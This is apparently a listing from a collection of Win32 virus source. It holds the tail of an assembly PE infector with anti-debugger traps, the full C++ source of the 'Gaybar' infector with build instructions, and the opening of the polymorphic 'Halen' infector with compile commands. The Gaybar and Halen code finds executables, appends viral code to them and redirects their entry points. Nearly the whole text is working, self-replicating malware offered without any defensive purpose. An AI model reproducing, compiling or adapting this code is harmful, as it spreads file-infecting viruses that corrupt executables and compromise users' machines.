cmp al, 20h ;is it space ?
jne cat
cat1: mov edi, offset CmdLine ;destination
lodsb ;movsb with char in al
stosb
cmp al, 0 ;end of params ?
je run_prg
cat0: lodsb ;same as previous
stosb
cmp al, 0
jne cat0
run_prg:
mov edx, offset DestFile ;edx as file to param
mov win32_find_data.WFD_nFileSizeLow, 2048 ;save num. of bytes to map
call OpenFile ;open and map our file
jecxz end_host ;if error, quit
mov eax, [ecx.MZ_lfanew - 4] ;load oroginal MZ_lfanew
mov [ecx.MZ_lfanew], eax ;and save it to that original pos.
call CloseFile ;close and unmap file
mov [space], 20h ;add params
xor eax, eax
push offset lppiProcInfo ;procinfo
push offset lpsiStartInfo ;start info
mov [lpsiStartInfo], SIZE lpsiStartInfo ;size of start info
push eax ;directory
push eax ;enviroment
push eax ;create options
push eax ;inherit handles ?
push eax ;thread SA
push eax ;process SA
push offset DestFile ;command line
push eax ;app name
call CreateProcessA ;create process !
xchg eax, ecx
jecxz end_host ;if error, quit
push -1 ;infinite
push [hProcess] ;child process
call WaitForSingleObject ;wait for signaled state
push [hThread]
call CloseHandle ;close thread primary thread handle
push [hProcess]
call CloseHandle ;close process handle
end_host:
mov edi, offset DestFile
push edi ;file to delete
mov byte ptr [edi+space-DestFile], 0 ;add NULL between file and params
call DeleteFileA ;delete it !
exit: popad ;restore all registers
ret ;otherwise this quit metod will not work !
db 75h ;some prefix
long_name:
lodsb ;load char
cmp al, '"'
jne long_name ;wait for next "
jmp cat1
db 73h ;some prefix
InfectFile proc
mov ebx, ecx ;save address of MM-file
cmp word ptr [ecx], IMAGE_DOS_SIGNATURE ;must be MZ
jne end_InfectFile
cmp dword ptr [ecx.MZ_lfanew-4], 0 ;mustn't be infected already
jne end_InfectFile
mov edx, [ecx.MZ_lfanew]
add ecx, edx
cmp dword ptr [ecx], IMAGE_NT_SIGNATURE ;must be PE\0\0
jne end_InfectFile
cmp word ptr [ecx.NT_FileHeader.FH_Machine], IMAGE_FILE_MACHINE_I386 ;must be 386+
jne end_InfectFile
movzx eax, word ptr [ecx.NT_FileHeader.FH_Characteristics]
not al
test eax, IMAGE_FILE_EXECUTABLE_IMAGE or IMAGE_FILE_DLL
jne end_InfectFile ;must be executable, mustn't be DLL
;at this point:
; EBX - start of MM-file
; ECX - PE header of MM-file
mov ebp, ebx
mov edi, ecx
sub edi, ebx
mov [ebx.MZ_lfanew-4], edi ;save original MZ_lfanew
mov eax, win32_find_data.WFD_nFileSizeLow
mov [ebx.MZ_lfanew], eax
mov edi, ebx
add edi, eax
mov edx, [ebx.MZ_lfanew]
add edx, ebx
push edx ;push it, will be needed l8r
call MyOpen ;open and map me
pop edx
jecxz end_InfectFile ;can't open, quit
push edx
mov esi, [ecx.MZ_lfanew]
add esi, ecx
push ecx
mov ecx, (503) / 4 ;PE header size + section header size
cld
rep movsd ;copy PE header + all section headers
pop esi
pop edx
;at this point:
; EDX - start of our new PE header
; EBP - start of MM-file (MZ header)
; ESI - start of MM prg+virus (MZ header)
; EDI - pointer to memory, where will be copied virus sections
push ebp
;from ...
mov ecx, [esi.MZ_lfanew]
add ecx, esi
movzx ebx, word ptr [ecx.NT_FileHeader.FH_SizeOfOptionalHeader] ;size of optional header
;to ...
mov ebp, edx
movzx edx, word ptr [edx.NT_FileHeader.FH_SizeOfOptionalHeader] ; ...
mov eax, 4 ;number of sections
copy_sections:
pushad
pushad
call Align ;align position
mov [esp.Pushad_edi], edi
popad
;from ...
lea ebx, [ecx.NT_OptionalHeader + ebx]
add esi, [ebx.SH_PointerToRawData] ;address of section data
mov ecx, [ebx.SH_SizeOfRawData] ;size of section data
;to ...
lea edx, [ebp.NT_OptionalHeader + edx]
mov ebx, edi
sub ebx, [esp.cPushad.RetAddr]
mov [edx.SH_PointerToRawData], ebx ;save pointer
rep movsb
mov [esp.Pushad_edi], edi
popad
sub ebx, -IMAGE_SIZEOF_SECTION_HEADER ;next section
sub edx, -IMAGE_SIZEOF_SECTION_HEADER ;next section
dec eax
jne copy_sections
pop ebp
mov eax, 'EVA' ;success, toggle flag
end_InfectFile:
ret
InfectFile EndP
db 72h ;some prefix
Align Proc
mov eax, edi
mov ebx, 200h ;our align
AlignIt:xor edx, edx ;nulify idiv remaider
push eax
idiv ebx ;divide it !
pop eax
test edx, edx ;mod = 0 ?
je end_align ;yeah, align complete
inc eax ;no, increment address
jmp AlignIt ;and jump back
end_align:
mov edi, eax ;edi = new aligned address
ret
Align EndP
db 75h ;some prefix
MyOpen proc
cdq ;edx = 0
push edx ;hTemlate
push edx ;normal attributes
push OPEN_EXISTING ;creation options
push edx ;SA
push FILE_SHARE_READ or FILE_SHARE_WRITE ;share mode
push GENERIC_READ ;desired access
push offset lpFileName ;lpFileName
call CreateFileA ;open it !
inc eax ;eax = -1 ?
je end_MyOpen3
dec eax
mov hMyFile, eax ;save handle
mov esi, eax
cdq ;edx = 0
push edx ;lpszMapName
push edx ;max. size low
push edx ;max. size high
push PAGE_READONLY ;fdwProtect
push edx ;SA
push esi ;hFile
call CreateFileMappingA ;create mapping !
xchg eax, ecx
jecxz end_MyOpen2 ;eax = 0 ?
mov hMyMapFile, ecx ;save handle
xor eax, eax ;eax = 0
push eax ;bytes to map
push eax ;offset low
push eax ;offset high
push FILE_MAP_READ ;dwDesiredAccess
push ecx ;hMapObj
call MapViewOfFile ;map it !
mov lpMyFile, eax ;save handle
xchg eax, ecx ;ret. value in ecx
ret
db 76h ;some prefix
MyClose:
push [lpMyFile]
call UnmapViewOfFile ;close mapped file
end_MyOpen2:
push [hMyMapFile]
call CloseHandle ;close mapping
end_MyOpen3:
push [hMyFile]
call CloseHandle ;close file
xor ecx, ecx
ret
MyOpen EndP
db 75h ;some prefix
;same as previous
OpenFile proc
xor eax, eax
push eax
push eax
push OPEN_EXISTING
push eax
mov al, 1
push eax
ror eax, 1
rcr eax, 1
push eax
push edx
call CreateFileA
cdq
inc eax
je end_OpenFile3
dec eax
mov hFile, eax
push edx
mov esi, win32_find_data.WFD_nFileSizeLow
sub esi, -4096
push esi
push edx
push PAGE_READWRITE
push 0
push eax
call CreateFileMappingA
cdq
xchg eax, ecx
jecxz end_OpenFile2
mov hMapFile, ecx
push esi
push edx
push edx
push FILE_MAP_WRITE
push ecx
call MapViewOfFile
mov lpFile, eax
xchg eax, ecx
ret
db 76h ;some prefix
CloseFile:
push [lpFile]
call UnmapViewOfFile
end_OpenFile2:
push [hMapFile]
call CloseHandle
end_OpenFile3:
push [hFile]
call CloseHandle
xor ecx, ecx
ret
OpenFile EndP
db 77h ;some prefix
seh_fn:
@SEH_RemoveFrame ;remove SEH frame
popad ;restore regs
call GetVersion ;get windows version
cmp eax, 80000000h ;is it WinNT ?
jb NT_debug_trap ;yeah, freeze this app
cmp ax, 0a04h ;or Win98
jb no_debug_trap ;Win95-
debug_trap: ;Win95/98
call IsDebugger
mov eax, 909119cdh ;set some instructions
jmp $ - 4 ;say bye to your balls :-)
db 2dh ;some prefix
no_debug_trap:
jmp seh_rs ;jump back
db 2dh ;some prefix
NT_debug_trap:
call IsDebugger
xor esp, esp ;this will freeze our app
push ecx ;if not, this will cause
;access violation exception
IsDebugger:
pop ebx
push offset kernel
call GetModuleHandleA ;get memory address of kernel32
xchg eax, ecx
jecxz no_debug_trap ;error, jump
push offset IsDebuggerPresent
push ecx
call GetProcAddress ;get procedure address of our API
xchg eax, ecx
jecxz no_debug_trap
call ecx ;call IsDebuggerPresent
xchg eax, ecx
jecxz no_debug_trap
jmp ebx
ends
End Start
Win32/Infector/Win32.Fever.asm
+7158
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Fly.asm
+1037
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Foroux.a.asm
+2579
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Freebird.asm
+2259
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Ganja.c.7z
BIN
View File
Binary file not shown.
Win32/Infector/Win32.Gaybar.asm
+420
View File
@@ -0,0 +1,420 @@
/*
Welcome to the GAYBAR§§§ (from ikx industries)
-================================================-
Technically, this virus has nothing new. It's a very old school virus that appends
its code to the last section and modifies the entry point in the PE header. It
browses the import table in order to find the kernel address and imports APIs by CRC.
The virus is about 1200 bytes long. It's a bit big for a virus of this kind and it
requires some optimization. The main idea is that it was written in 100% c++ to take
advantage of the use of classes. No assembly file or special linking is needed. It
does everything just as a standard assembly virus would do. It has no need for
relocation; it can use global pointers and ignores the delta pointer problem. It was
compiled using Visual Studio Architect. Just remove the "Buffer Security Check" and
put it in release mode. (Dont forget to put size optimization). It also seems to work
with Visual Studio 6.0.
But, all is not pink in this happy world. There are a few problems. You can't use any
strings inside the executable. I reconstructed the strings by dropping values into
buffers as a meta virus would do. (int k[0] = 'xe.*') We are seeking how to solve
this problem in a better way. Also, it's not really 100% c++ as it still has a stub
loader that will call the virus body. This part is in assembly and consists of a few
pushes and a call. This virus might be "portable" to other platforms as long as you
remedy the stub problem.
The point of this virus is to pimp people to the c++ side. A virus can be done within
a reasonable size using c++, doing almost as well as an assembly virus. I hope this
creates a new era with future babies coming along.
Greets to:
Vorgon: You are god, i bow down before you oh master dark lord of VX. My Hero!
Lifewire: to have pimped me to the c++ side, for the original idea as well as the
the motivation
UnderX: to be the 1st to listen to my bragging description
Griyo: who was the second
Cecile: Damn, I like you, wanted to dedicate this virus to you but I preferred the
GAYBAR! jtm
Morphine: for correcting my english! 10x0r!
Welcome to the GAYBAR !!
*/
#include "stdio.h"
#include "windows.h"
#include "PE.hpp"
typedef void* __stdcall iGetModuleHandle(char*);
typedef void* __stdcall iLoadLibraryA(char*);
typedef HANDLE __stdcall iFindFirstFileA(void*,LPWIN32_FIND_DATA);
typedef bool __stdcall iFindNextFileA(HANDLE,LPWIN32_FIND_DATA);
typedef void __stdcall iOutputDebugStringA(char*);
typedef HANDLE __stdcall iCreateFileA(char*,DWORD,DWORD,DWORD,DWORD,DWORD,HANDLE);
typedef HANDLE __stdcall iCreateFileMappingA(HANDLE,DWORD,DWORD,DWORD,DWORD,char*);
typedef void* __stdcall iMapViewOfFile(HANDLE,DWORD,DWORD,DWORD,DWORD);
typedef void __stdcall iUnmapViewOfFile(void*);
typedef void __stdcall iCloseHandle(HANDLE);
typedef DWORD __stdcall iGetFileSize(HANDLE, int);
#define LoadLibraryACrc 0x660E91B6
#define FindFirstFileACrc 0xFACA6F2D
#define FindNextFileACrc 0x47F9DA21
#define OutputDebugStringACrc 0xFBDF28B7
#define CreateFileACrc 0x8DC85CF9
#define CreateFileMappingACrc 0xA3A46E23
#define MapViewOfFileCrc 0x505C8F3F
#define UnmapViewOfFileCrc 0x5239B6AF
#define CloseHandleCrc 0x4E1ED759
#define GetFileSizeCrc 0xC37E2502
#define vir_size (((int) main - 0x00401000))
void __stdcall start(void *ImageBase, void *viruslocation);
int main(int argc, char **argv);
int iround(int a, int b) { return ((a / b)+1)* b; }
// Dumb crc routine, it isn't really crc, less powerful but it's sufficient for
// apiname checking.
DWORD GetAPICrc(char *name)
{
DWORD k = 0;
for(int i = 0; name[i] != 0; i++)
k = (k << 3) + (k >> (sizeof(k) -3)) + name[i];
return k;
}
class virus
{
public:
//
// Api finder, you specify the Address base of the PE and the crc
// of the address and it will return the address to you. If it fails, it
// returns 0 and sets a global flag called missed
//
void *GetProcAddressCrc(char *ModuleBase, DWORD APICrc)
{
PE_STRUCT *PEheaderBase = (PE_STRUCT *) (ModuleBase + ((DWORD *) (ModuleBase+0x3C))[0]);
PE_EXPORT_STRUCT *ExportTable = (PE_EXPORT_STRUCT *) ( ModuleBase + PEheaderBase->pe_exportrva);
if(PEheaderBase->pe_exportrva != 0)
{
// Here you get all the pointers, so once it's found, you only have to
// grab the data from the table once
DWORD* NameTable = (DWORD *) (ModuleBase + ExportTable->ex_namepointersrva);
WORD* Ordinaltable = (WORD *) (ModuleBase + ExportTable->ex_ordinaltablerva);
DWORD* AddressTable = (DWORD *) (ModuleBase + ExportTable->ex_addresstablerva);
for(int i = 0; i < ExportTable->ex_numofnamepointers; i++)
{
if(GetAPICrc((char *) ModuleBase+NameTable[i]) == APICrc)
return ModuleBase+AddressTable[Ordinaltable[i]];
}
}
missed = true;
return 0;
}
// Linked chain
struct NameList
{
NameList *Previous;
void *location;
};
//
// Find the Kernel32 address by browsing the Import Table. It searches for
// "KERNEL32". If the library isn't KERNEL32, it browses the import
// table of the library. This is done by using a recursive function. It
// scans the import table and imports the table of imported libraries, and
// etc. But, It could cycle :( What if user32.dll points to advapi.dll
// and advapi.dll points to user32.dll? It would cycle infinitly.
//
// I stored a list of already scanned libraries (NameList). Before scanning
// sub libraries, it checks if the libary hasn't been scanned yet.
//
void *GetK32Address(char *PEImageBase, NameList *List = 0)
{
PE_STRUCT *PEheaderBase = (PE_STRUCT *) (PEImageBase + ((DWORD *) (PEImageBase+0x3C))[0]);
PE_IMPORT_STRUCT *ImportTable = (PE_IMPORT_STRUCT *) (PEImageBase + PEheaderBase->pe_importrva);
if(PEheaderBase->pe_importrva != 0)
{
char* LibName; // we will scan every name
while(PEImageBase + ImportTable->im_name)
{
LibName = PEImageBase + ImportTable->im_name;
// gets the base address of the library
WORD **apitable = (WORD **) ((char*) PEImageBase + ImportTable->im_addresstable);
WORD *location = (WORD *) ((char *) apitable[0] - ((WORD *) apitable)[0]);
while( location[0] != 'ZM') location = (WORD *) ((char*) location - 0x1000);
// it isn't the kernel ?
if(! ((((DWORD *) LibName)[0] == 'NREK') && (((DWORD *) LibName)[1] == '23LE')))
{
bool dosearch = true;
NameList *item = List;
while(item != 0 && dosearch) // have we searched
{ // this library ?
if(location == item->location) dosearch = false;
item = item->Previous;
}
if(dosearch) // if not, it adds the name to the list
{ // and scans this library
NameList newitem = { List, location };
void *retaddr = GetK32Address((char *)location, &newitem);
if(retaddr != 0) return retaddr;
}
}
else return location;
ImportTable = (PE_IMPORT_STRUCT *) ((char *) ImportTable + sizeof(PE_IMPORT_STRUCT));
}
}
return 0;
}
//
// Searches all the needed api, starting by retrieving kernel32 address
// from current process import table, if it's found, import all apis. If an
// api is missed, bool missed has been set to true and it will return false
//
bool Import(void *PEImageBase)
{
char *K32Address = (char *) GetK32Address((char *) PEImageBase);
missed = false;
if(K32Address)
{
LoadLibraryA = (iLoadLibraryA *) GetProcAddressCrc( K32Address, LoadLibraryACrc);
FindFirstFileA = (iFindFirstFileA *) GetProcAddressCrc( K32Address, FindFirstFileACrc);
FindNextFileA = (iFindNextFileA *) GetProcAddressCrc( K32Address, FindNextFileACrc);
OutputDebugStringA = (iOutputDebugStringA *) GetProcAddressCrc( K32Address, OutputDebugStringACrc);
CreateFileA = (iCreateFileA *) GetProcAddressCrc( K32Address, CreateFileACrc);
CreateFileMappingA = (iCreateFileMappingA *) GetProcAddressCrc( K32Address, CreateFileMappingACrc);
MapViewOfFile = (iMapViewOfFile *) GetProcAddressCrc( K32Address, MapViewOfFileCrc);
UnmapViewOfFile = (iUnmapViewOfFile *) GetProcAddressCrc( K32Address, UnmapViewOfFileCrc);
CloseHandle = (iCloseHandle *) GetProcAddressCrc( K32Address, CloseHandleCrc);
GetFileSize = (iGetFileSize *) GetProcAddressCrc( K32Address, GetFileSizeCrc);
}
return (K32Address && !missed);
}
//
// Remap the file and in the same way resize the file
//
void Remap(int newsize)
{
UnmapViewOfFile(MapAddress);
CloseHandle(FileMapping);
FileMapping = CreateFileMapping(File,NULL, PAGE_READWRITE, 0, newsize, 0 );
MapAddress = (char *) MapViewOfFile( FileMapping, FILE_MAP_ALL_ACCESS, 0, 0, newsize);
}
// drop a push instruction to a memory location
void createpush(char *location, int value)
{
(location)[0] = (char) 0x68;
((int *)(location+1))[0] = value;
}
// We got the file maped at (MapAddress), we are going to infect
// that file
void ProcessInfection()
{
// check if exe
if( ((WORD *) MapAddress)[0] == 'ZM' )
{
PE_STRUCT *PEheaderBase = (PE_STRUCT *) (MapAddress + ((DWORD *) (MapAddress+0x3C))[0]);
// check if PE
if( ((DWORD *) PEheaderBase)[0] == 'EP' )
{
// get lastsection offset
PE_OBJENTRY_STRUCT *lastsection = (PE_OBJENTRY_STRUCT *)
((char *) PEheaderBase + sizeof(PE_STRUCT) +
(PEheaderBase->pe_numofobjects - 1) * sizeof(PE_OBJENTRY_STRUCT));
// save information, later we will need to return to host
// viruspos will be a working variable for now
int old_entrypoint = PEheaderBase->pe_entrypointrva + PEheaderBase->pe_imagebase;
int viruspos = max(lastsection->oe_physsize, lastsection->oe_virtsize);
// change last section size in physical and memory, change
// his permission
lastsection->oe_physsize = iround( viruspos+vir_size, PEheaderBase->pe_filealign);
lastsection->oe_virtsize = iround( viruspos+vir_size, PEheaderBase->pe_objectalign);
lastsection->oe_objectflags |= IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ;
// set new entry point
PEheaderBase->pe_entrypointrva = viruspos + lastsection->oe_virtrva;
int new_entrypoint = PEheaderBase->pe_entrypointrva + PEheaderBase->pe_imagebase;
int old_imagebase = PEheaderBase->pe_imagebase;
// viruspost is now the position where we should drop virus
viruspos += lastsection->oe_physoffs;
// recalculate PE size in memory
PEheaderBase->pe_imagesize = lastsection->oe_virtrva + lastsection->oe_virtsize;
// resize file
Remap(iround(lastsection->oe_physoffs + lastsection->oe_physsize, 128) + 69 );
char *virusdest = MapAddress + viruspos;
// we are dropping the stub loader
// we will push on stack old entrypoint
// two next value will be forwarded to virus
createpush(virusdest, old_entrypoint);
createpush(virusdest+5, new_entrypoint+21);
createpush(virusdest+10, old_imagebase);
// drop call to virus
(virusdest+15)[0] = (char) 0xE8;
((int *)(virusdest+16))[0] = ((int) start - 0x00401000)+1;
// then ret, who will jump to host
(virusdest+20)[0] = (char) 0xC3;
virusdest += 21;
// drop virus here (memcpy didnt worked :()
for(int i = 0; i < vir_size; i++)
(virusdest++)[0] = ((char *) VirCode)[i];
// drop virus copyright :)
((__int64*) virusdest)[0] = 0x20656D6F636C6557;
((__int64*) virusdest)[1] = 0x4720656874206F74;
((__int64*) virusdest)[2] = 0x2020215241425941;
((__int64*) virusdest)[3] = 0x334B325D584B495B;
}
}
}
// This function basically opens a file specified in input
// then maps it. If mapping succeed and finally it ask to
// ProcessInfection()
void infect(char *filename)
{
File = CreateFileA(filename, GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
if( File != INVALID_HANDLE_VALUE )
{
int FileSize = GetFileSize(File,0);
FileMapping = CreateFileMapping(File,NULL,PAGE_READWRITE,
0, FileSize, 0 );
if( FileMapping != INVALID_HANDLE_VALUE )
{
MapAddress = (char *) MapViewOfFile( FileMapping,
FILE_MAP_ALL_ACCESS, 0, 0, FileSize);
if(MapAddress != 0)
{
ProcessInfection();
UnmapViewOfFile(MapAddress);
}
CloseHandle(FileMapping);
}
CloseHandle(File);
}
}
// The real entry point of the virus. Here, we manipulate everything
// inside the object. It just searches for various *.exe inside the
// current directory
void start_virus(void *PEBase, void *VirusCode)
{
if(Import(PEBase))
{
WIN32_FIND_DATA datas;
HANDLE fileresult;
VirCode = VirusCode;
char trashbuffer[8];
// search for *.exe
((__int64 *) trashbuffer)[0] = 0x06578652E2A;
fileresult = FindFirstFileA(trashbuffer, &datas);
if(fileresult != INVALID_HANDLE_VALUE) do
{
if( (datas.nFileSizeLow % 128) != 69)
infect(datas.cFileName);
}
while(FindNextFile(fileresult, &datas));
}
}
/*
* The Api Table
*
******************/
iLoadLibraryA* LoadLibraryA;
iFindFirstFileA* FindFirstFileA;
iFindNextFileA* FindNextFileA;
iOutputDebugStringA* OutputDebugStringA;
iCreateFileA* CreateFileA;
iCreateFileMappingA* CreateFileMappingA;
iMapViewOfFile* MapViewOfFile;
iUnmapViewOfFile* UnmapViewOfFile;
iCloseHandle* CloseHandle;
iGetFileSize* GetFileSize;
// functions
bool missed;
HANDLE File;
HANDLE FileMapping;
char *MapAddress;
void *VirCode;
};
// This creates an instance of object virus on the stack, and then calls the
// virus. The global variable inside the class will be taken from the stack
// and not from data
void __stdcall start(void *ImageBase, void *viruslocation)
{
virus A;
A.start_virus(ImageBase, viruslocation);
}
// this will fake the stub loader and call our virus
int main(int argc, char **argv)
{
int k = vir_size;
start((void*) 0x00400000, (void *) 0x00401000);
printf("welcome to the Gaybar: %i\n", k);
return 0;
}
Win32/Infector/Win32.Gemini.asm
+1998
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Georgina.3657.asm
+1124
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.H0rtiga.asm
+1606
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Halen.asm
+961
View File
@@ -0,0 +1,961 @@
; win32.Halen virus
; (C)reated by pxR[MIONS]
; January 2k+1 ł
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄŮ
;
;
; Uvodem
; ÄÄÄÄÄÄŮ
;Dovolte me abych vam predstavil jeden z mych lame viru :) (muj prvni pod win)
;Tohle je win32 nerezidentrni PE infektor - prilepi se na konec PE souboru
;(zvetseni posledni sekce). Je to kodovanej virus jakymsi shit poly algoritmem :),
;kterej jsem tak nejak narychlo sepsal. Kazdou sobotu v 19:xx (nebo 20:xx podle
;rocniho obdobi ;) to zobrazi dialog a po jeho potvrzeni to zacne odsouvat obraz
;doprava se zmenou pozadi.
;
; Jak kompilovat?
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄŮ
; tasm32 /m3 /ml Halen.asm,,;
; tlink32 /Tpe /aa Halen,Halen,,import32.lib
; pewrsec Halen.exe
;
;
; Par slov o tom, jak funguje ten poly shit (nic zajimavyho!):
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄŮ
;de/en crypt rutina je tvorena nahodne generovanymi instrukcemi ADD, SUB, XOR, ROR a
;ROL.
;
;Na zacatku decrypt rutiny jsou vzdy istrukce:
;CALL 0000000; POP EDI; ADD EDI,xxxxxxxx; MOV ESI,EDI; XOR EBP,EBP; CLD; LODSD;
;
;Na konci decrypt rutiny jsou vzdy istrukce:
;STOSD; INC EBP,xxxx; CMP EBP,xxxx; JNE xxxxxxxx
;
;Encrypt rutina vypada jinak. Neobsahuje uvodni (init) instrukce (CALL az LOSDS) a
;koncove instrukce (STOSD az JNE). Na jejim konci je RET. Pri kodovani pak vlozime
;do EAX hodnotu, kterou chceme zakodovat, provedeme CALL na tuto rutinu a obdrzime
;v EAX zakodovanou hodnotu.
;
;Registr, se kterym jsou provadeny instrukce ADD az ROL (pracovni registr) je volen
;nahodne a muze byt uvnitr de/en crypt rutiny kdykoliv menen. Vybira se z
;registru EAX az EDX.
;
;Nejdrive se vygeneruji data pro de/en crypt rutinu.
;napr:
; 87D0 82EAC28F 81C2EADC7143A0 87C9C990 C0C9C187 ...... 87C1
; ^zmena prac. registru
;Na zacatku a na koci dat jsou vzdy 2 byty - instrukce XCHG prac.reg.,EAX (zacatek) a
;XCHG EAX,prac.reg. (konec). Jsou nutne k provadeni instrukci LODSD a STOSD.
;Po pocatecnim XCHG (2 byty) zacinaji vlastni data. 1. byte specifikuje instrukci
;dale nasleduje 2 byty, ktere specifikuji registr, ktery se pouzije. Jeden byte pro
;decrypt a druhy pro encrypt rutinu (pouzije se vzdy jen jeden podle toho, jakou
;rutinu chceme vygenerovat). Dale uz nasleduji data (1 nebo 4 byty - zalezi na
;instrukci).
;
;Potom je z techto dat vytvarena bud encrypt rutina nebo decrypt rutina (viz vyse)
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű A TADY JE TEN BROUCEK Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
.386p
.model flat
extrn ExitProcess:proc
extrn MessageBoxA:proc
.data
FGMessage db 'This is win32.Halen, a PE infector created by pxR[MIONS]',0h
FGTitle db 'win32.Halen',0
.code
debug equ 1 ;!!!!!!
Start:
cld ;
call OffsetTrick ;Starej dobrej offset trik
OffsetTrick: pop ebp ;
sub ebp,offset OffsetTrick ;
pushad ;Ulozit registry (pro pripad chyby)
lea eax,[ebp+offset ExceptHndl] ;EAX=VA obsluhy chyby
push eax ;
push dword ptr fs:[0] ;
mov dword ptr fs:[0],esp ;Nastavit SEH frame
mov eax,[ebp+offset origIP] ;
mov [ebp+offset retIP],eax ;
mov esi,[esp+28h] ;Odkud jsme byli volani?
and esi,0FFFF0000h ;Zaokrouhlit na Page
mov ecx,6h ;Opakovat max. 5 krat
GetK01: dec ecx ;Dec pocitadlo
jz Return2Host ;5. pokus?
cmp word ptr [esi],'ZM' ;Byla nalezena MZ signatura?
jz GetK02 ;yo!
GetK03: sub esi,10000h ;Ne -> zkusime predchozi Page
jmp GetK01 ;Opakujeme
GetK02: mov edi,esi ;
mov edx,esi ;Uschovat nalezenou VA kernelu
add edi,[esi+3Ch] ;Posunem na zacatek PE headeru
cmp word ptr [edi],'EP' ;Je to PE ?
jz GetKOK ;yo -> mame kernel
jmp GetK03 ;ne -> hledame dal
ExceptHndl: ;
mov esp,[esp+8] ;Obnovit puvodni ESP
Return2Host: ;
pop dword ptr fs:[0] ;Obnovit SEH frame
add esp,4 ;Jeste ESP
popad ;Registry
cmp ebp,0 ;Prvni generace viru?
je VirusEnd ;yo -> ukaz dialog
lea ebx,[ebp+offset Start] ;Vypocet originalni startIP
sub ebx,[ebp+offset retIP] ;
jmp ebx ;Navrat k hostiteli
retIP dd ? ;
GetKOK: ;
xchg esi,edi ;
mov [ebp+offset K32VA],edi ;Ulozime nalezenou VA kernelu
mov esi,[esi+78h] ;ESI=RVA na export table kernelu
add esi,edi ;Prevedem RVA na VA
add esi,18h ;
lodsd ;Number of Exported Names
mov [ebp+offset K32EOMax],eax ;Ulozit
lodsd ;Export Adress Table RVA
add eax,edi ;RVA na VA
mov [ebp+offset K32EAT],eax ;Ulozit
lodsd ;Export Name Pointers Table RVA
add eax,edi ;RVA na VA
mov [ebp+offset K32ENPT],eax ;Ulozit
lodsd ;Export Ordinals RVA
add eax,edi ;RVA na VA
mov [ebp+offset K32EO],eax ;Ulozit
lea esi,[ebp+offset APITableStr] ;ESI=VA jmena prvni hledane API
lea edi,[ebp+offset APITableVA] ;EDI=VA tabulky VA API
;ŰßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßŰ
;Ű HLEDANI API FUNKCI Ű
;ŰÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜŰ
FindAllAPIs:
lodsb ;AL=delka nazvu API
cmp al,0 ;Konec?
je FindAPIsOK ;yo -> hotovka
movzx ecx,al ;ECX=AL
push edi ;Uschovat EDI
call FindAPIVA ;Hledat API!
xchg esi,edi ;ESI<->EDI :)
pop edi ;Obnovit EDI
test eax,eax ;API nenalezena (chyba)
jz Return2Host ;Navrat do hostitele
stosd ;Ulozit nalezenou VA do tabulky
jmp FindAllAPIs ;Hledat dalsi
FindAPIVA: ;Vstupni parametry:
xchg edi,esi ; -esi=VA API jmena
mov esi,[ebp+offset K32ENPT] ; -ecx=delka API jmena
xor edx,edx ;Vynulovat pocitadlo
FindAPI00: ;ESI=Export Name Pointer Table VA
lodsd ;EAX=API name RVA
add eax,[ebp+offset K32VA] ;RVA na VA
push esi ;Uschovat registry
push edi ;
push ecx ;
push edx ;
xchg eax,esi ;
rep cmpsb ;Porovnat s nalezenym jmenem
pop edx ;Obnovit registry
pop ecx ;
pop edi ;
pop esi ;
jz FindAPI01 ;100% shodne -> nalezeno
inc edx ;Neshoduji se -> inc Pocitadlo
cmp edx,[ebp+offset K32EOMax] ;Prozkouseny vsechny Export. names?
jae APINotFnd ;yo -> chyba
jmp FindAPI00 ;Zkusit dalsi nazev
FindAPI01: ;
shl edx,1 ;EDX=EDX*2
mov esi,[ebp+offset K32EO] ;
add esi,edx ;ESI=offset K32EO+EDX
xor eax,eax ;EAX=0 :)
lodsw ;EAX=API ordinal
shl eax,2 ;EAX=EAX*4
mov esi,[ebp+offset K32EAT] ;
add esi,eax ;ESI=offset K32EAT+EAX
lodsd ;EAX=RVA k API
add eax,[ebp+offset K32VA] ;RVA na VA
add edi,ecx ;EDI posunem na dalsi nazev API
ret ;Hotovo!
APINotFnd: xor eax,eax ;Nenalezeno -> EAX=0
ret ;Zpet
FindAPIsOK: ;
call PayLoad ;Pust payload
if debug ;Pokud je debug=1 budem infikovat
lea esi,[ebp+testFName] ;jen soubor test.exe
call InfectCurrDir ;Infikuj aktualni adresar
jmp Return2Host ;Navrat do hostitele
endif ;
lea eax,[ebp+offset origDir] ;Ulozime si aktualni adresar
push eax ;
push eax ;
push 128h ;Max delka cesty
call [ebp+offset GetCurrentDirectoryAVA];Zjistit aktualni adresar
lea ebx,[ebp+offset currDir] ;
mov eax,[ebp+offset GetWindowsDirectoryAVA] ;Budeme menit adresar na WINDOWS
call ISCh ;Zmenit adresar & infikovat
mov eax,[ebp+offset GetSystemDirectoryAVA] ;Ted na WINDOWS\SYSTEM
